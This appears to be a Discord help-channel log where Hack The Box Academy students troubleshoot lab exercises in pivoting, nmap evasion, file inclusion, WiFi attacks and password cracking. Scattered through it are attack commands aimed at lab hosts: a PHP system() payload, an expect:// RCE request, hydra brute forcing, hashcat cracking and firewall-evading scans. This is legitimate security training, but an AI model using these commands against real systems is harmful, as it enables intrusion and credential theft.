stuck on the second bola exploit, hint says to target the ||/api/v1/suppliers/quarterly-reports/{ID}|| endpoint, I feel like I'm missing something because I get 403 forbidden since my credentials don't have the required role

You can DM if you are still stuck.

appreciate the help! it's always something stupid

Can someone help me in AD enum & atk - skill assessment 1 ?
I wanna upload chisel.exe to Windows web shell, however I can't find any chisel.exe package online, instead there's chisel_1.9.1_windows_amd64.gz on Github.
Although I've check "chisel_1.9.1_windows_amd64" is an executable, I can't execute it with
chisel_1.9.1_windows_amd64 or & "C:\chisel_1.9.1_windows_amd64" (is not recognized as the name of cmdlet, ... or program) on Powershell
How could I "execute" it , or change to actually an executable (I've tried append .exe extension but not work)
Thanks

Rename the file to have the exe extension after
It should execute in windows

Did you extract the executable from the compressed format?

yes, i've gunzip -d *.gz

oh it works, but after server-client connected, it seems like I cant access 172.16.x.x
should

should I restart?

(/etc/proxychains.conf
socks5 127.0.0.1 1080)

hi guys currently doing {Login Brute Forcing } | {Web services} ive successfully brute forced the creds and its giving me | sshuser@94.237.60.154: Permission denied (publickey). when tring to login

looks like the wrong ip, that's a public ip. or you're on the wrong port.

yeah but that lab doesent require an openvpn to connect to the lab

nvm mind guys i got it lol

I have questions about the student subscription, should I continue buying the modules with cubes or are they included when paying the $8 monthly?

With the student sub you get access to all modules up to tier 2

And modules you complete, are yours to keep

so i dont have to pucharse cubes?

No

ok thanks

i will subscribe

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions#h_d0354c1221

I've used Ligolo for pivoting going through other lab setups, but this is the first time I use it for double pivot. It's part of the pivoting and tunneling skills assessment. I have read several walkthroughs on it, and have so far:

• To avoid any mismatch, I re-downloaded the proxy and agents from the same release.
• I added a new ligolo tun interface to get the second pivot connected on that one.
• I've tried different ports for the second pivot through the first (added listener).

But every time I execute the agent on the second pivot (windows) I get the same error on the Ligolo server:
ERRO[1845] dial tcp 127.0.0.1:11601: connect: connection refused

Does anyone recognize this error, has encountered it or understand what it's about? I have googled but cannot understand why it goes wrong.

Thank you for any input!

Honestly it seems like the wifi pentest module is a little buggy here and there 🙂

Not complaining. If you ask me a little buggy is best so its a bit like real world. 🙂

so i'm trying to get a reverse shell on one of the labs but i'm having an issue that the lab doesn't recognize the openVPN ip address.

the openVPN ip address is 10.10.14.102, i tried to run the following command on the target <?php system ("ping -c 3 10.10.14.102"); ?> just to assure that there is a valid connection. but the returned value is 100% lost..

what i'm i missing here?

Did you try to restart your VPN for good measure?

yes

What module is this?

getting started 🙂

the nibbles lab

there is a different VPN you have to download for the starting point section

O that is just a retired lab

in it not the starting point. my bad

but the lab works when i run the OpenVPN file i already have, i get connection to HTB server, so it must not be a file issue

can you ping the lab?

from your attack host

yes ofcourse

Well if you can ping the lab that means it is not a connection issue. It has something to with you are not doing something correctly. 🙂

i just check the network interface using ipconfig /all on my windows machine it returned this regarding openVPN status:

Unknown adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : TAP-Windows Adapter V9 for OpenVPN Connect
   Physical Address. . . . . . . . . : 00-FF-81-86-73-21
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.14.102(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . :
   NetBIOS over Tcpip. . . . . . . . : Enabled

so i used the correct ip address to ping from the lab to my machine

yeah i know, i just can't figure it out, when i ran <?php system ("ping -c 3 10.10.14.102"); ?> on the lab, it returned that all packets were lost, so it tried to connect, and the command executed correctly.
what may the issue be?

windows doesn't respond to pings often

hold on.

i tested it on a LAN windows machine, i was able to ping to it, what do u mean?

yes if you have firewall enabled its not going to respond to ping

But what i dont understand is. You are connecting to the VPN on your windows and using a VM for linux or how? you just use windows with WSL to hack?

so if i tried to ping from the other LAN machine to my machine using my eth0 IP address, do u mean it won't respond on the other LAN machine?

well yeah i'm using WSL, but the long story short, i'm currently just trying to ping from the Lab machine to the openVPN ip address

because i need to change some configs within WSL to allow bridge connection so i can use to for reverse shells

It depends if you set your firewall for a public or private network i believe

try doing anyting else, like putting up a python http server, and see if that works

man you are making life hard for you i can tell you that. Just use a VM 😄

so if i try to ping from other LAN machine to mine, you mean that it won't respond, right?

Try turning the firewall off and see

I said it depends. Firewall has public and private network setting

i want to use a VM, but i'm currently using a laptop, so the monitor size is kind of annoying 😂.. gonna buy a monitor just not soon enough

ok if i sat up a python server, what then?

change your payload to get something from it instead of pinging you, and see if that reaches you

ah nice idea, so using curl http://pythonIpAddress.com on the lab machine is enough

Topic LFI
cant read/find any file within /etc /var folder
can bypass ../ with double url encode
can only read error file with php wrapper base64 read resource which i fuzzed
Know its nginx and know the php version
Any approach how to gain rce?

Which lab exactly are you on? on the LFI section.
Can you access the accsses.log file of nginx?
when i was doing that module what was happening was my payload was crashing the access.log of nginx and i had to reset the lab

i tried to access /var/log/nginx/access.log but dont get any result back

did a bunch of ../ before

Its the LFI assessment: https://academy.hackthebox.com/module/23/section/513

You should have access to that the access.log file with LFI

but before that

did you find the hidden admin directory?

Guess I have to do somehow log poisoning but cant access the log file...

can anyone help with the last question at the hidden SSID section on the WI-Fi pen testing module? Cant seem to figure this one out

Identify the name of the hidden SSID with the BSSID d2:a3:32:1b:29:d5 and submit it as your answer.

Whatever way i choose to find the hidden SSID it dosent work and if it does it gives the name a previous Bssid

I just did this :D. It works. You have to use the wordlist provided in the /opt directory

i did and it is not the same as first question? "Cybernet-******"

Its not the same. you gotta use sudo mdk3......

Am i doint someting wrong ? wifi@WiFiIntro:~$ sudo mdk3 wlan0mon p -f /opt/wordlist.txt -t d2:a3:32:1b:29:d5

It doesnt look like it. What is the output of this command?

Nothing

Also there are no packets being sent to d2:a3:32:1b:29:d5 so cant use aireplay-ng either

Anyone can help me out on DACL Skills assessment, 3rd question i have got the laps password for WS01 but not able to rdp into the machine

If you are trying to rdp directly from your VM it wont work. You have to pivot

@final shale found the admin directory and the log file - used the user agent to write something to the log files (system/http/chat.log) but doesnt get logged if i search for the keyword

Man this host we RDP into on the wifi pentesting module is so slow...

This is the wrong log file. You have to use a different log file. For the log poison.

So I have to do lfi on the second parameter somehow?

No. If you have the admin dir. Now you would be able to access the access.log file of nginx from that directory(the admin one)

"Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer."

Is there an easy way to open a file without vim? I tried using nano but it doesn't work on my machine. I am having a really hard time attempting to edit the vim file for the question in this module section:

https://academy.hackthebox.com/module/51/section/1844

I hate vim

nano

Yes I tried nano but it doesn't work

not for this machine

pluma [file]

cat [file]

cat is only for looking at the file I thought, not editing

Ill try pluma

Try vi

echo "[text]" > or >> [file]

Also, this works fine when uploading godpotato onto the host & running it directly - I'm only encountering the subsequent "execute" command issues when I create a sacrificial process & inject the donut generated shellcode of godpotato into the process..

Anyone else has ran into this while double pivoting with Ligolo?

One option is using cat EOT. If nothing works editing wise on the remote host consider replacing the file?

Hey guys, can someone explain how nopac module in netexec works? I read the theory of nopac, but i can't get how the one can decide if DC is vulnerable to nopac by comparing the sizes of TGT without PAC and TGT with PAC.

guys in the api module the target isn't alive , I tried accessing it deleting the cache , logging out , but nothing works

anyhelp ?

hi is the target working for you ?

Hello, I'm doing the Linux enumeration module and in section 'Environment Enumeration' (https://academy.hackthebox.com/module/51/section/1592), I'm getting answer incorrect even tough I've found the flag.txt in the root folder. I tried submitting it in different formats but no luck : HTB{xxxxxxxxx}, {xxxxxxxxx}, xxxxxxxxx
Did anyone have an issue like this ?

I don't think that's the right flag, at least in my notes is in a different place.

yes i did the pivoting . not sure why not able to connect

Hello ! i'm doing the nmap's bases path, and i'm stuck in the Firewall and IDS/IPS Evasion - Hard Lab.
From the course i saw that there is a way to specify a source IP and a source port using -S and -g. My issue is, if i specify a source IP and target interface, i get the following error :

q@grospc:~$ sudo nmap 10.129.34.50 -n -Pn -p 445 -O -S 10.129.34.200 -e enp4s0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 14:54 CET
setup_target: failed to determine route to 10.129.34.50
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds

failed to determine route to 10.129.34.50

Use the same steps as the Evasion section

you mean this page ?

https://academy.hackthebox.com/module/19/section/106

Yep

but they dont cover how to configure this, they just show that you can specify a source ip and it directly works

You dont need to specify source ip to pass this module

ah, okay, i'll try to not use it then, but i'm still concerned on why it doesnt works on my machine

even on the pwnbox it doesnt works

but you are missing something crucial in the command.

ah

Scan all ports and make scan so it looks like DNS queries. 😉

so you mean i should use the -sU option to make udp scans ?

no

-sS is fine

find which port uses dns and make traffic from nmap go trough there

but arent dns servers / dns queries working with udp

mh this is what i get with -sS

m@grospc:~$ sudo nmap 10.129.34.50 -n -Pn --top-ports=10 -sS --disable-arp-ping -g 53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 15:05 CET
Nmap scan report for 10.129.34.50
Host is up.

PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
80/tcp   filtered http
110/tcp  filtered pop3
139/tcp  filtered netbios-ssn
443/tcp  filtered https
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server

Its a hint man. you are taking it too litteral 🙂

with udp scan it says open|filtered for all ports

You are close. scan all TCP ports

remove the top-10...

but i figured out that if i scan too many ports i get blocked

i will test

do -T2

in that case to be quiet but i dont think that was nessasry

oo yeah to be less aggressive

with -T2 it says it will complete in 30 mins 🤔

also without it just says that all ports are filtered

so here did you meant to use -g 53 ?

Yes. Did you do -p- ?

idk i cant get any port open 🤔

as said if i try too many port then i get blocked

but in the hint they say this :

Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data
And the service 139/tcp netbios-ssn has been added which is meant to transmit heavy data traffic

i dont understand how to access this port in order to get more information on the service using nmap

i dont think the 139 port was the right one

I will check

here is the command i executed : sudo nmap 10.129.34.50 -n -Pn --top-ports=10 -g 53 -sS -D RND:5

mmh

Are you doing enum with nmap module and you are on the hard assesment lab?

yeap

this one https://academy.hackthebox.com/module/19/section/119

you sure you are scanning the right thing? I get only 3 ports opened

sudo nmap 10.129.33.221 -sS -Pn -n --disable-arp-ping --reason -v -g 53

what wtf you got the results very fast, why do i have to wait for 5 mins for the nmap to complete

for the hard lab make sure to scan ALL ports tcp and udp, and scan for source ports because -p- udp scans will take forever

and try to connect to that port in a Different way not nmap to get your flag, and be patient wait 30 seconds

I think it maybe because nmap saved my scans.

sudo nmap 10.129.33.221 -sS -p- -Pn -n --disable-arp-ping --reason -v -g 53
this command should work just change the ip

this comand will take ~20 mins to complete, is that normal

and scan for source ports
Wdym scan for source ports 🤔

Not sure whats going on there buddy. It doesnt take that long for me.

🤔

The wifi labs are annoyingly laggy honestly.

Even the clipboard is laggy it needs like 2 seconds to copy anything from the terminal 😄

i just tried to establish a python server on the same OpenVPN ip address which is 10.10.14.102:9999, but i couldn't curl the Python Server on the lab.. it looks like a one way connection

So you have outgoing connection from attacker to lab but not the reverse?

I still think its the firewall. Did you try disabling it temporarily?

yes, mine is managed by avast, so i just turned off avast protection

exactly

You sure the windows one is also not on?

Dude something on your end (Attacker) is blocking incoming connections

its a stupid firewall or AV

or something to do with WSL and that whole botched deal

created by Microsoft 😄

you were right, turning off avast triggers windows defender by default to go on, i just turned off the public, private, domain networks protections manually and the lab pinged to me

but it stumps me, i never touched the firewall and inserted rules related to openVPN, why did this happen? and how do i trace which rule is preventing incoming connections??

Bro no offence but didnt i tell you about the firewall 3 hours ago 😄

i thought avast manages firewall connections, it is what the control panel says 😭

but thank you i must've doubted that turning off avast is enough to completely shut off the firewall 🙂

You dont even need Avast dude. Use just defender.

but how do i trace which rule is preventing openVPN connections to me? or do i need to create an inbound rule or what to do?

got no experience with firewalls yet 🙂

I have the exact same problem. I even tried using nmtui but the connection I setup with the answers from question 1 and 2 doesn't even show up in the Activate list. I tried connecting to the non-hidden one and ran into similar troubles. It wouldn't be so frustrating if the machine wasn't so crazy slooooooow.

You need to perform a technique to connect to the non-hidden one

Well you can make a inbound rule to exclude the openVPN i guess

The module was well constructed as to perform the techniques taught throughout in a sequence

i will make one right one

i just created an inbound rule pointing to openVPNConnection.exe and allowed all 3 types of network activities (public, private, domain), but it didn't fix the issue; if i restore the firewall protection the lab can't ping me.

huh?

I'd redo the whole module if the machine wasn't so effin slow. I've tried to do so but I have to wait 5 minutes for every click to register so it's not really feasible. Oh well, I expected to get mysterious and undecipherable answers here. Will continue searching elsewhere. 5 days wasted on this machine that takes 5 minutes just to draw the desktop.

That module isn't supposed to be hard.
If you are trying to hard, something must be wrong.

If you are experiencing issues related to lag or latency, you can always try using the Pwnbox

#modules

Also, by what HTB Staff have stated, there may be 2 paths to completing.
I've completed it without any effort because one of them was just too straight up after scanning for Wireless devices for the first flag.

I know! I breezed through the rest of the module and am stuck on the last and easiest question. So annoying. Pwnbox was pretty much equally slow. I've been stalking the VPNs for 3 days, waiting for "Low and recommended", 😄

Perform a brute-force attack on the WiFi network named HackTheBox_Secure. What is the WPS PIN?
this is for the Attacking Wi-Fi Protected Setup (WPS) - Secured Access Points
Are you guys sure this is even possible? tried -L -N it doesnt seem to be working

You can DM me if you feel the answer was too riddled. 😂

Just don't wanna give any spoilers

Yea I know. And it's not a dig against you. From reading through these forums, it seems the concern for spoilers is consistently so great as to needlessly diminish the helpfulness of the answers. 😉

I feel you. There are some useless messages on higher tier module.
Forum might be of better help in this case

No kidding! I'm typing commands, walking away for lunch, coming back and watching it still catching up with the typing! 😅

has pwnbox been lagging for anyone else today?

Well its not that laggy but i would say about a second per click 😄

no other suggestions?

Hi,

Module: Attacking Common Applications
Section: Skills Assessment II
Section Link: https://academy.hackthebox.com/module/113/section/1108

I have managed to get reverse shell as www-data user. I still cannot get the flag though. When I run a find , no results are returned:

Another nice little WiFi module!

https://academy.hackthebox.com/achievement/799850/186

i figured it out, i had to mark the openVPN network as trusted by the firewall, but can someone explain to me why only this solution allowed connections even though i inserted a firewall rule to allow all connections previously?

Hi guys I am trying the windows fundamentals module, submodule: NTFS vs. Share Permissions and im trying to connect as a client to the windows server. But when i do i don't get the shares as a result. I get the error: do_connect: Connection to 10.129.46.255 failed (Error NT_STATUS_IO_TIMEOUT). What is exctly the error here? I realize that both my linux system and windows system i rdp'ed are seemingly not in the same subnet and thus i think i cant connect to each other? But If i do put them in the same subnet i will lose connection right?

Thanks for the help!

Intro to Whitebox Pentesting module, I'm doing the patching exercise. I've literally patched the code, and I don't see how code injection is possible, since I removed the dynamic function creation, and the only thing the user input is used for is in a console.log and Math.floor call, where code injection is not possible, afaik. How the hell is this patch endpoint thing finding injection still? Can someone enlighten me?

Module: Windows Privilege Escalation
Section: Windows Server
Link to section: https://academy.hackthebox.com/module/67/section/912

Could someone please explain to me why we need to migrate to a 64-bit process? It just states the exploit will not work in section, but why?

It does touch on it saying that if you used a 64bit payload that step would not be necessary. Also if you click on the blue link for searching for privilege escalation, there's a message in there saying that it requires a 64bit process.

I just visited the link as per your suggestion. It supports x86 architecture too, though?

print_error("Running against via WOW64 is not supported, try using an x64 meterpreter..."

Noted. Thanks!

maybe you dont have the privileges to find the flag.txt, so try to see if u can privesc or change user. also maybe its not named flag.txt

maybe its named like Flag.txt

solved by moving sanitization outside of calling the password generation function, instead of at the start of the function... I think this module should be reviewed. It's generally best to validate input INSIDE the function, because then the caller is not responsible for sanitizing their own input. Also, it doesn't matter where the sanitization is in this case, so not sure why the tool flags the sanitization inside the function

You're searching in /var/www could it be elsewhere?

you don't have the permissions required to access that dir

Greetings I have created account with my academic email and for some reason it doesn’t allow me to choose the student discount plan

Is there someone who can help me with this issue ?

Reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Thank !

What module and section?

You need to read the section again, it spells out how to do it.

I did priv escalation. It was nice!

I was actually in the root directory for nagios. I searched a little here and there. But find could not locate it. Anyways, I did priv esc. So, got the flag!

ARE YOU SERIOUS ?

<@&861185840277487616>

😂

lol

Twice

sigh...

damn the skill assessment was challenging

Can someone give me a nudge for this section to be able to read the flag:
Attacking Common Applications - Skills Assessment I?
I have tried everything to read the content of flag.txt,
but nothing works except for the dir command.
I also attempted to use type, more, and less,
but they didn’t work either.

I tried using PowerShell instead:

plaintext

Get-Content flag.txt

But nothing worked.

I have tried both exploits in Searchsploit, but the only thing that worked was Gobuster, which helped me find this file path.

what happens if you do it in your browser instead of burp, it looks like your get request is off but i could be wrong

It gives no response; it's blank

alright, well your burp looks wrong, i think it should be different color than the "GET" part but i could be wrong

No. Burp works well too but the problem is the command, only dir works

maybe encode it all?

If you got RCE via web shell and you are getting problems reading files, why not move to a reverse shell!?

Skill issue:
I couldn't find the module in metasploit.
And the skill issue is that i wasn't able to setup manually the requirements needed for exploit.
So i am using the RCE via web shell because it was way easier.

What happened? lol the target machine is different now

you had a different port in your previous screen shot

ok i need to rest lmao

I did it. Thanks

Is there any way I can make the module "the live engagement" under shells and payloads faster

?

make it faster how

Idk it takes 20 seconds to see the output of ls in terminal

Thanks, @acoustic owl ! You're life saver! Got my sanity back!

https://academy.hackthebox.com/achievement/799850/240

Not much really to my knowledge, not sure why that happens but yeah happened to me alot too.

Whoever came up with the idea for making a cheatsheet at the end of every module deserves a raise.

You can download them as PDF and save them in Obsidian

I can't ping machines from my local machine, but can when I'm in pwnbox. I'm in "getting started - privilege escalation." I'm connected to the VPN, any idea?

Do a sudo killall openvpn; sudo openvpn ~/Downloads/academy-regular.ovpn

*and make sure you don't have a Pwnbox running at the same time as trying to VPN in from your local machine

Congrats 🤘

Sick module!

if i cancel my HTB Academy subscription, will i only retain access after my a module if i have 100% completed it or is simply enrolling in it enough?

You'll only retain access if you complete the module 100% IIRC

thank you for clarifying

I ran sudo killall openvpn, and made sure I don't have any Pwnbox running, still can't ping boxes. I logged out of HTB, restarted my VM, logged back in, connected to VPN, and still can only ping from within Pwnbox.

have you recently switched vpn regions?

Do you get any errors from the openvpn command on your local VM?

I don't see any errors

Is it normal to get the same IP in Pwnbox, as the VPN gives you locally?

Haven't switched regions

Yes

Want to take this to DM duvel?

ok. do killall -9 openvpn, in your browser press CTRL+SHIFT+R, then terminate the target, then shut down your VM entirely. reboot your host PC. after that launch your VM, connect to the VPN, click spawn target, and wait 5 mins for it to fully spawn, then try again.

Well, you're connected to the VPN from somewhere, and that client is reachable

do all academy targets respond to pings?

I.. would have thought so

i guess he said he could ping from the pwnbox

This one does if I'm in Pwnbox

Curious if your VM has internet access. Don't want to overstep someone else troubleshooting but if not, do a 'sudo systemctl restart NetworkManager && sudo systemctl status NetworkManager && ping 1.1.1.1'

I can help diagnose in DM if you want @terse sedge - I do see a connection currently

Otherwise I'd say change server and try again. If that does not help, raise a ticket with the support team.

I can't ping 1.1.1.1

Routing overlap of your local network and the HTB network possibly? :\

What do you get from ip route list ?

Again, you can share in DM if you want, instead of here.

sure

The IP you mentioned for the target.. it's not active any more btw

Perhaps you need to start it again?

Should see it now

I do, and I can ping it. Sent a DM with a few questions

That kind of interactive portion does not require VPN access, btw.. but if you can't ping it from VM then there's obviously something wrong

Ask for advice, not for the answer.

I asked for the advice because I want to learn and improve

https://imgur.com/a/G9jguuJ

I got it but I don't fully understand why

Why is John not able to crack the password? This is in passwords attack lab medium

also, if you have a monthly subscription that gives you cubes, then any module you unlock with cubes will be yours forever

There is some catch with it I've done it different command from john

Try this @crimson moon hashcat -m 17200 timelapse.hash /usr/share/wordlists/rockyou.txt

For some reason john doesn't recognize the format automatically that's my assumption

Throws the error of “no hash loaded”

Is Timelapse.hash the output after you do zip2john?

Yes that's correct

how to fix kerberos time skew?

Instead of mode 17200 for hashcat try 17210 or 17220

You have hashcat examples when you can look upm the hashes to identify them

As I recall I think I solved it like that

@crimson moon let me know of the results

how do i feed impacket the server time?

tried faketime/ntpdate $IP but no avail

Same result it says “Signature unmatched” have tried different modes referring to hashcat examples but to no avail.

Send me a DM let me try it @crimson moon

Anyone else having issues with the RDP question in the Password Attacks module, Network Services section?

I know what the user is, I get a hit with hydra if I pass in the exact user and password. However, if I pass in the exact user and a password list, I will not get a hit even with an extremely slow brute force command

hydra -L ./user.txt -P ./Desktop/Shared/HTB\ Academy/Password-Attacks/password.list rdp://10.129.239.175 -t 2 -W 4

It seems like the only way to get a hit on the RDP service is to pass in the exact values, and some users on the forums have mentioned having issues with the RDP service in the past as well

try brute forcing a different service

All of the other services work fine

It's just RDP causing problems

im trying to do the enumerating users section of the broken authentication module and when I try to run the ffuf command it says command not found

sudo apt install ffuf

thank you

impacket tool to add user to a group?

Attacking Common Applications - Attacking Thick Client Applications
Can anyone can give me a pointer to what I need to do here? I've read on the forums the importance of finding the red arrow but in the module I see a red arrow going down one line, smallest red arrow I found is going down two rows and when I follow those in Memory Map they do not have a row "User - Map - RW"

scroll down the memory map tab?

Did you set the breakpoint properly?

I have to right click a CPU entry first to get to the memory map, and whenever I click and check the memory map I filter by User and none of them have R-W and/or Map

Pretty sure I did then I restarted the program, is it meant to break at the entry we right click on and take it to memory map? If so that would be the last entry in the CPU tab right?

Follow the section

The section explicitly tells you what to do, and what breakpoint to set

in the getting started module for privelege escalation i cannot understand how to obtain the flag for the second question.

https://academy.hackthebox.com/module/77/section/844

i cant run any scripts. none of the commands or walkthroughs seem to even remotely steer me in the correct direction, and i think its due to just slapping two huge repositiories for enumeration in front of people and saying "figure out which one works" bc as simple as the answer probably is, I cant figure out how to get root. i got to user 2. the hint says "dont forget to chmod" ive been on this for a week.

have you tried looking at hidden folders in root's directory with the 2nd user?

you know, i had the thought, but didnt really know how to execute so i didnt investigate. i'll look into that!

yep, whenever you gain access to another user you want to see what kind of permissions that user has that you may not have had access to before. looks like user2 can read something in there.

on the task at the end of file inclusions - php wrappers i was able to get RCE from both the data wrapper and the input wrapper. But I cannot for the life of me figure out how to do the same with the expect wrapper, despite it being installed. my payload is ||curl -s "http://94.237.63.109:37671/index.php?language=expect://id"|| but it just returns the normal page. any hints would be much appreciated.

I am stuck on :
Shells & Payloads
The Live Engagement.
Host # 1
Issue: i have run payload many time and wait for even 30mnts also to receive reverse shell connection but no results.

your lhost looks off

may want to delete the pics though not really it's needed here, kinda gives part of it away

so what to do now?

your lhost is your listening host, do you have a nic that has 172.x.x.x?? your vpn is probably 10.x.x.x

yeah the rdp in which i am connected have the ip of 10. but as the target exist in inner network so the inner address is 172.

well metasploit can't listen on an ip you don't have on the same box that metasploit is running off of

i also have tried nc

You can pivot through an msf implant though right? IIRC there were a load of features for setting up routes through msf payloads

..but perhaps not included in that module

i know metasploit has an autoroute feature but i haven't really used it, and yeah i don't think it's included in that module

here it is

any solution for mine one?

what's the IP of your VPN connection

I only used it like once, in the pivoting module i think.. so yeah i'm not that familiar with it. i generally avoid metasploit if i can.

i am using pwnbox

it is payload & shelll module

alright well either way it sounds like you don't have the correct lhost, just verify all your settings

That's > Tier 0, so please take advice to DM 🙂

or at least can anyone confirm that it is possible/impossible so i know i am not going insane

Guys I am new on HTB how am I suppose to prepare for mobile cahallenges there are no modules in academy

It's possible that module is disabled

is the module being disabled independent of whether "extension=expect" is in the php.ini file?

i don't know

i know it's not enabled by default

I completed the pivoting skills assessment with other tools, but still curious why I couldn’t make Ligolo work for a double pivot. I kind of hoped for some interest in the subject but obviously not

copy : Cannot find path '\\192.168.1.19\MYSHARE\supersecretpass.txt' because it does not exist. At line:1 char:1 + copy \\192.168.1.19\MYSHARE\supersecretpass.txt + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\192.168.1.19\...rsecretpass.txt:String) [Copy-Item], ItemNotFoundExce ption + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand i am getting this error while transferring files with smbserver

verify the IP address

i can ping the ip and ip is correct

In my experience it should usually be a 10.10.x.x IP

or 10.129.x.x for the target

i am running a vm on my local network

but you're connecting to HTB resources right via vpn

not sure if that could be it

no i am locally doing it

i can ping the ip and i set the vm to bridge adaptor bcz nat have some issue i dont know .

the request is coming to the smb server with an ntlm hash

but closintg down the connection

hash is coming from HTB victim box?

.

ah not sure then sorry

What module/section?

moduel file transfers in windows file transfer section in #smb downloads

That module doesn't have you do it locally. Host the SMB server from the VPN connection.

no i am locally doing that

i found many people are facing the same problem

https://github.com/fortra/impacket/issues/1340

smbserver works fine, you're doing weird stuff locally with nat

that's not part of the module to locally transfer between your host and vm

it works

with creds

i am using bridge adaptor . yeah i know things will get complicated in nat . it doesnt matter if the connection is local or remote . smb will work fine

its the problem of smbserver i have the latest one from github maybe u downloaded it with repo

probably the version of smb you're using, i think smbv2 requires creds

but your error indicated the path didn't exist/couldn't connect so idk.

the connection is coming to the server

then connection refused

i am getting ntlm hash so there is auth but there is no auth on my share so we have to set auth on smb share too

I am so curious as to how HTB made the wifi labs. 🙂

Everyone asleep? You have to be more dedicated guys 😄

this was the question i was given: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

this is what i put in for the command: curl -s https://www.inlanefreight.com/ | grep -oP 'href="https://www.inlanefreight.com[^"]*"' | sed 's|https://www.inlanefreight.com||' | sort -u | wc -l

but i still got the question wrong, why?

i was able to solve it using AI, but non urgently if someone could describe to me what this all means that would be awesome

I've finished writing the report for the Documentation and Reporting Skill Assessment. Would anyone with experience like to take a look and give me feedback?

I don't have much experience, but i can give you a second opinion if you like.

Is Introduction to Deserialization Attacks PHP lab only very unstable for me? Seems like it takes minutes to load the pages every time, also times out from time to time. Restarting the target didn't help

Can anyone help me with the Skill Assessement on Wifi pentesting basics? What is the password for the WiFi network with the BSSID D8:D6:3D:EB:29:D5? Cant seem to find out the pass . I managed to find the answer for the first question

can you specify the module/section you are referring to? not sure if I can help, but I'll take a look

Check the module again. There you will be shown step by step how to get the password. You have already done the same a few sections before.

Anyone having issues with metasploit snd Parrot 6.2? across several modules I get the same error “can not load stdapi” and “load stdapi” does not work. But my parrot 6.1 vm and the pawn box work

Module: Windows Privilege Escalation
Section: Windows Privilege Escalation Skills Assessment - Part I
Link to section: https://academy.hackthebox.com/module/67/section/637

I managed to obtain a reverse shell and have tried most manual enumeration stuff and even used a few tools shown in the module, and even checked metasploit. I've prolly missed something. Could someone please give me a nudge?

Edit: I managed to get the flag, however, I have a couple questions. I can't ask the questions here without revealing info, so please DM me if you'll be fine answering my questions. I managed to privilege escalate, but haven't got the answer to question 2. If someone could also nudge me on question 2, I'd greatly appreciate it.

linux fundementals filter contents 😁

Hey dummy, read the #rules

One message removed from a suspended account.

I have a quick answer

One message removed from a suspended account.

One message removed from a suspended account.

dm. I'm doing the same thing and managed to get flag 2

Wrong channel to ask in, read and follow #welcome to access #hardware-iot-ics

One message removed from a suspended account.

One message removed from a suspended account.

It's in your settings page, as stated in the message

Literally step 1

In Active Directory Enum & Attacks > Bleeding Edge Vulnerabilities with something like NoPAC, Print Nightmare or PetitPotam, and probably loads more... what's the efficient way of identifying the likelihood that these exploits are worth a shot. The reading material covers just 3, but assuming there are a dozen more and variants of each, running individual checkers or just trying them seems like the wrong strategy.

or maybe I'm thinking about this wrong.

winPEAS ||if you are lazzy||

Thanks, I was hoping this would be covered more going forward... like in Windows Priv Esc. ||and who isn't lazy when it comes to tedious checklists that can be automated?||

I mean... For AD you can always use Bloodhound or Adalanche
They will show you a straighter path to Domain Compromise

But I like detailed output, so I always go for PowerView first

Anyone who completed "Active Directory Trust Attacks module"?? If yes can you reply to this message I will DM you with my doubts!

Hey guys! This is the only channel I found in which I could write something. I am a Software Engineer and I would like to change my career path into cyber security. I hold technical knowledge in software and IT but maybe I do not hold so much knowledge in cyber security. Is it okay if I go and directly start one of the intermediate career paths, or should I start with the Information Security Foundations? Do they give some introductions into the different job paths in the Information Security Foundations path? Thank you in advance

Hi I think you should as your career related questions on #careers-and-certs

I do not have access to that link 😦